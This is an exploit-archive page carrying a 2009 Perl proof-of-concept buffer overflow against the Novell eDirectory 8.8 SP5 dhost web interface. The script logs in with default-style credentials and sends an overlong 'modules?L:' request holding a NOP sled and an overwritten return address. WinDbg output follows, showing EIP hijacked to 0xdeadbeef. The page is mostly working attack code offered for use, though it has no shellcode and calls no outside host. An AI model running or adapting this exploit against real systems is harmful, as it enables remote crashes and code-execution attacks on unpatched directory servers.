exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Novell eDirectory 8.8 SP5 Proof Of Concept

Novell eDirectory 8.8 SP5 Proof Of Concept
Posted Oct 26, 2009
Authored by karak0rsan, murderkey | Site tcc.hellcode.net

Novell eDirectory version 8.8 SP5 for Windows proof of concept buffer overflow exploit.

tags | exploit, overflow, proof of concept
systems | windows
SHA-256 | ba9b1bdb9f350ebe348f99b9a102fd4c9f4d556dfbe999f07b23a3755a9a0738

Novell eDirectory 8.8 SP5 Proof Of Concept

Change Mirror Download
#PoC for Vulnerability:
#!usr\bin\perl
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs

use WWW::Mechanize;

use LWP::Debug qw(+);

use HTTP::Cookies;

$target=$ARGV[0];


if(!$ARGV[0]){

print "Novell eDirectory 8.8 SP5 Exploit\n";

print "Hellcode Research || Hellcode.net\n";

print "Usage:perl $0 [target]\n";

exit();
}



$login_url = "$target/_LOGIN_SERVER_";

$url = "$target/dhost/";

$vuln = "modules?L:";

$nop = "\x90" x 1668;

$eip = "\xef\xbe\xad\xde";

$data = "B" x 235;


$hellcode = $vuln.$nop.$eip.$data;

########Write your usr and pwd########

$username = "Admin.context";

$password = "1234";


my $mechanize = WWW::Mechanize->new();


$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));


$mechanize->timeout($url_timeout);

$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));


$mechanize->submit_form(

form_name => "authenticator",

fields => {

usr => $username,

pwd => $password},

button => 'Login');

$response2 = $mechanize->get("$url$hellcode");



##Debugger Results of PoC:

Windbg- File>Attach to a process>dhost.exe

eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000
eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:\Windows\system32\ntdll.dll -
ntdll!DbgBreakPoint:
77867dfe cc int 3
0:088> g

Debuggee is running...


##C:\Users\DELL\Videos\karak0rsan\Perl\bin>perl novelbof.pl

##Debugger Results after running poc:

(1cc.1d44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878
eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found.
Defaulted to export symbols for
C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36\MSVCR80.dll -
MSVCR80!vfwprintf_p+0x5b:
75c11684 8802 mov byte ptr [edx],al ds:0023:038b0000=??

-- EAX = 00000042 (writed a part of eax)

##0:010> g

(8e4.bb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000
eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
deadbeef ?? ???

#EIP=deadbeef - We controled eip ;)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close